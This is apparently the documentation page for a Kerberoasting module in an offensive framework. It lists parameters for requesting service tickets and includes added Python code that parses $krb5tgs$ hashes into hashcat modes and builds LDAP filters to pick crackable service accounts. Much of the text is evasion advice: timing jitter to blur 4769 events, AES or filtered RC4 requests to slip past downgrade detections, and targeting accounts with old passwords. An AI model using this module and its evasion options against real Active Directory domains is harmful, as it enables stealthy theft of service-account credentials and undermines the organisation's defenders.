Description
Performs Kerberoasting to extract TGS ticket hashes for offline cracking.
Overview
Performs Kerberoasting by requesting TGS (service) tickets for user accounts that have a servicePrincipalName registered. Any authenticated domain principal can request these tickets; the encrypted part of each ticket is protected with a key derived from the service account's password, so the ciphertext can be taken offline and cracked without any further contact with the DC. Tickets returned with RC4 (etype 23) crack far faster than AES (etype 17/18) ones. Supports narrowing the target set by SPN, user, OU, password age and a custom LDAP filter, plus opsec-oriented options for request timing and encryption type.
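How the collected ticket material is consumed offline, as an added example (not the module's own code): a parser for the two `$krb5tgs$` hash layouts that hashcat and John accept, which checks the checksum length for each etype and maps the etype to its hashcat mode (13100 for RC4, 19600 for AES128, 19700 for AES256). The sample hashes are constructed placeholders with short hex, not real tickets.

```python
"""Parse Kerberoast hashes and route each to the right cracking mode.

Added example for this page, not the module's own code. It accepts the two
$krb5tgs$ layouts that hashcat/John consume: etype 23 (RC4) as
$krb5tgs$23$*user$realm$spn*$checksum$edata and etype 17/18 (AES) as
$krb5tgs$17|18$user$realm$*spn*$checksum$edata. The sample hashes are
constructed placeholders with short hex, not real ticket material.
"""
import re
from dataclasses import dataclass

# enc-part etype -> (cipher name, hashcat mode, checksum length in hex chars)
ETYPES = {
    23: ("rc4-hmac", 13100, 32),                 # 16-byte HMAC-MD5 checksum
    17: ("aes128-cts-hmac-sha1-96", 19600, 24),  # 12-byte HMAC-SHA1-96 checksum
    18: ("aes256-cts-hmac-sha1-96", 19700, 24),
}

_RC4_BODY = re.compile(r"\*([^$*]+)\$([^$*]+)\$([^$*]+)\*\$([0-9a-fA-F]+)\$([0-9a-fA-F]+)")
_AES_BODY = re.compile(r"([^$*]+)\$([^$*]+)\$(?:\*([^$*]*)\*\$)?([0-9a-fA-F]+)\$([0-9a-fA-F]+)")


@dataclass
class RoastHash:
    etype: int
    user: str
    realm: str
    spn: str
    checksum: str
    edata: str

    @property
    def cipher(self) -> str:
        return ETYPES[self.etype][0]

    @property
    def hashcat_mode(self) -> int:
        return ETYPES[self.etype][1]


def parse_kerberoast_hash(line: str) -> RoastHash:
    prefix = "$krb5tgs$"
    if not line.startswith(prefix):
        raise ValueError("not a $krb5tgs$ hash")
    etype_str, _, body = line[len(prefix):].partition("$")
    if not etype_str.isdigit() or int(etype_str) not in ETYPES:
        raise ValueError(f"unsupported etype {etype_str!r}")
    etype = int(etype_str)
    m = (_RC4_BODY if etype == 23 else _AES_BODY).fullmatch(body)
    if m is None:
        raise ValueError("hash body does not match the expected layout")
    user, realm, spn, checksum, edata = m.groups()
    want = ETYPES[etype][2]
    if len(checksum) != want:
        raise ValueError(f"etype {etype} checksum must be {want} hex chars, got {len(checksum)}")
    return RoastHash(etype, user, realm, spn or "", checksum, edata)


def is_valid_hash(line: str) -> bool:
    try:
        parse_kerberoast_hash(line)
        return True
    except ValueError:
        return False


def group_by_mode(lines):
    """Map hashcat mode -> list of account names, so each mode gets its own run."""
    groups = {}
    for line in lines:
        h = parse_kerberoast_hash(line)
        groups.setdefault(h.hashcat_mode, []).append(h.user)
    return groups


# Constructed samples (placeholder hex, not real tickets).
RC4_SAMPLE = ("$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*"
              "$a1b2c3d4e5f60718293a4b5c6d7e8f90$" + "deadbeef" * 8)
AES256_SAMPLE = ("$krb5tgs$18$svc_http$CORP.LOCAL$*HTTP/web01.corp.local*"
                 "$0011223344556677889900aa$" + "cafebabe" * 8)

if __name__ == "__main__":
    for sample in (RC4_SAMPLE, AES256_SAMPLE):
        h = parse_kerberoast_hash(sample)
        print(f"{h.user:10} {h.cipher:26} hashcat -m {h.hashcat_mode}  spn={h.spn}")
    print(group_by_mode([RC4_SAMPLE, AES256_SAMPLE]))
```

Splitting the hashes by mode before cracking matters in practice: a mixed file fails to load, and the AES entries (4096-iteration PBKDF2 string-to-key) are orders of magnitude slower per guess than the RC4 ones, so they deserve a separate, smaller wordlist budget.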
Arguments
| Parameter | Type | Description |
|---|---|---|
| SPN | string | A specific SPN to Kerberoast; only the account holding that SPN is targeted. |
| User | string | A specific user (samAccountName) to Kerberoast. |
| Domain | string | The target domain. Defaults to the current domain. |
| DC | string | The domain controller to send the LDAP queries and ticket requests to. |
| OU | string | Distinguished name of the OU to search within (e.g. OU=Servers,DC=corp,DC=local). |
| CredUser | string | Alternate credentials username for the LDAP queries. |
| CredPassword | string | Alternate credentials password for the LDAP queries. |
| Stats | switch | Display statistics about the roastable accounts without requesting any tickets; useful for scoping before a single TGS-REQ is sent. |
| AES | switch | Request AES-encrypted tickets (etype 17/18) instead of RC4. These crack much more slowly, but an AES request to an AES-capable account does not match the RC4 downgrade pattern that Kerberoast detections key on. |
Additional Parameters
- Ticket: Existing TGT (e.g. a base64 .kirbi blob) to use for the ticket requests instead of the current logon session's TGT.
- LdapFilter: Custom LDAP filter clause, ANDed with the default target search.
- PwdSetAfter: Only roast accounts whose password was last set after this date.
- PwdSetBefore: Only roast accounts whose password was last set before this date. Service account passwords that predate a stronger password policy are usually the most crackable.
- ResultLimit: Maximum number of accounts returned by the LDAP search.
- Delay: Delay in milliseconds between ticket requests.
- Jitter: Percentage by which each delay is randomised, so the resulting 4769 events do not arrive at a fixed interval.
- Simple: Simplified output, one hash per line with no surrounding text, ready to pass to a cracker.
- RC4Opsec: RC4 opsec-safe mode: request RC4 tickets via the TGT delegation trick, but only for accounts that do not have AES enabled in msDS-SupportedEncryptionTypes, so no RC4 ticket is requested for an AES-capable account.
- UseTGTDeleg: Use the TGT delegation trick to obtain a usable TGT from the current, non-elevated session and send the TGS-REQs with it, which lets the requested encryption type be set explicitly (RC4 only) rather than whatever the local Kerberos stack would offer.
- Enterprise: Use enterprise principal names (NT-ENTERPRISE, user@domain form) in the ticket requests.
- Ldaps: Use LDAPS (TCP 636) for the LDAP queries.
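How the filtering options above combine into one LDAP search, as an added example that is not the module's own code. The function and parameter names mirror the options but are the example's own; only the search base and filter string are built (no LDAP connection), so it runs offline. It shows the pwdLastSet FILETIME conversion the date filters need, RFC 4515 escaping of operator-supplied names, and the msDS-SupportedEncryptionTypes exclusion an RC4 opsec mode relies on.

```python
"""Build the LDAP search that selects Kerberoast targets from the module's filters.

Added example for this page, not the module's own code. Function and
parameter names are the example's own, chosen to mirror the options above.
Only the search base and filter string are produced (no LDAP connection), so
it runs offline; the sample call at the bottom uses a made-up domain.
"""
from datetime import datetime, timezone

_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# msDS-SupportedEncryptionTypes bits for AES128 (0x8) and AES256 (0x10)
_AES_BITS = 0x8 | 0x10
# LDAP bitwise matching rules: OR = any listed bit set, AND = all listed bits set
_LDAP_MATCH_BIT_OR = "1.2.840.113556.1.4.804"
_LDAP_MATCH_BIT_AND = "1.2.840.113556.1.4.803"


def to_filetime(date_str: str) -> int:
    """pwdLastSet is a FILETIME: 100-ns ticks since 1601-01-01 UTC. Takes YYYY-MM-DD."""
    when = datetime.fromisoformat(date_str).replace(tzinfo=timezone.utc)
    delta = when - _FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000


def ldap_escape(value: str, keep_wildcard: bool = False) -> str:
    """RFC 4515 escaping so an operator-supplied name cannot alter the filter."""
    table = {"\\": r"\5c", "(": r"\28", ")": r"\29", "\x00": r"\00"}
    if not keep_wildcard:
        table["*"] = r"\2a"
    return "".join(table.get(ch, ch) for ch in value)


def domain_to_dn(domain: str) -> str:
    return ",".join(f"DC={label}" for label in domain.split("."))


def build_roast_query(domain, spn=None, user=None, ou=None, pwd_set_after=None,
                      pwd_set_before=None, ldap_filter=None, rc4_opsec=False):
    """Return (search_base, filter) for the target selection."""
    clauses = [
        "(samAccountType=805306368)",   # normal user accounts; machine accounts have random 120-char passwords
        "(servicePrincipalName=*)",     # only accounts with an SPN can be asked for a service ticket
        "(!(samAccountName=krbtgt))",   # a ticket for krbtgt is a TGT, encrypted with a key nobody cracks
        f"(!(userAccountControl:{_LDAP_MATCH_BIT_AND}:=2))",  # skip ACCOUNTDISABLE
    ]
    if user:
        clauses.append(f"(samAccountName={ldap_escape(user)})")
    if spn:
        # wildcards are meaningful in an SPN filter (e.g. MSSQLSvc/*), keep them
        clauses.append(f"(servicePrincipalName={ldap_escape(spn, keep_wildcard=True)})")
    if pwd_set_after:
        clauses.append(f"(pwdLastSet>={to_filetime(pwd_set_after)})")
    if pwd_set_before:
        clauses.append(f"(pwdLastSet<={to_filetime(pwd_set_before)})")
    if rc4_opsec:
        # Drop accounts with an AES bit set: an RC4 request for one of those is
        # the downgrade pattern detections look for. Accounts with the attribute
        # unset pass this filter and are served RC4 by default unless DC policy says otherwise.
        clauses.append(f"(!(msDS-SupportedEncryptionTypes:{_LDAP_MATCH_BIT_OR}:={_AES_BITS}))")
    if ldap_filter:
        clauses.append(ldap_filter)   # operator-written clause, appended unescaped by design
    return (ou or domain_to_dn(domain)), "(&" + "".join(clauses) + ")"


if __name__ == "__main__":
    base, flt = build_roast_query("corp.local", ou="OU=Servers,DC=corp,DC=local",
                                  pwd_set_before="2020-01-01", rc4_opsec=True)
    print(base)
    print(flt)
```

The OU option becomes the search base rather than a filter term, which is why it and the domain are handled separately from the other filters. The custom LdapFilter clause is appended verbatim on purpose (it is the operator's own filter syntax), whereas SPN and User values are escaped because they are plain names.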
Dependencies
- AD
Operating Systems
- Windows
